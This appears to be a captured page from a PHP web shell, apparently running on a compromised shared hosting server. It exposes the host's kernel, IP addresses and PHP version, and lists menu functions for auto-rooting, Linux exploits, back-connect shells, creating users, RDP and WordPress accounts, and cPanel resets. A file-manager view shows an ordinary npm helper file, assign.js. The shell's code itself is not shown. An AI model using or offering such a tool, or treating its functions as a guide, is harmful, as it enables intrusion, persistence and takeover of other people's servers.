Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.224.69.84
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
node_modules /
npm /
node_modules /
es-abstract /
helpers /
[ HOME SHELL ]
Name
Size
Permission
Action
assign.js
351
B
-rw-r--r--
isFinite.js
199
B
-rw-r--r--
isNaN.js
73
B
-rw-r--r--
isPrimitive.js
136
B
-rw-r--r--
mod.js
142
B
-rw-r--r--
sign.js
74
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : assign.js
var bind = require('function-bind'); var has = bind.call(Function.call, Object.prototype.hasOwnProperty); var $assign = Object.assign; module.exports = function assign(target, source) { if ($assign) { return $assign(target, source); } for (var key in source) { if (has(source, key)) { target[key] = source[key]; } } return target; };
Close